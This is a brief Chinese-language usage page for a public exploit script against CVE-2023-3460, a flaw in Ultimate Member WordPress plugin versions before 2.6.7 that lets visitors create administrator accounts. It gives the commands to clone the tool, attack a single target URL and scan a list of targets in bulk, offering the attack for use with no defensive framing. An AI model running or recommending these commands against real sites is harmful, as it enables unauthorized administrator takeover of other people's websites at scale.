2.6.7 之前的 Ultimate Member WordPress 插件未阻止访客创建具有任意权限的用户帐户,实际上允许攻击者随意创建管理员帐户。此脚本针对此漏洞执行漏洞利用,并扫描不同目标以查找此漏洞。
git clone https://github.com/diego-tella/CVE-2023-3460/
cd CVE-2023-3460/
python exploit.py
python exploit.py -t http://target.com/wordpress #basic usage
python exploit.py -c -l list.txt #scan a list of targets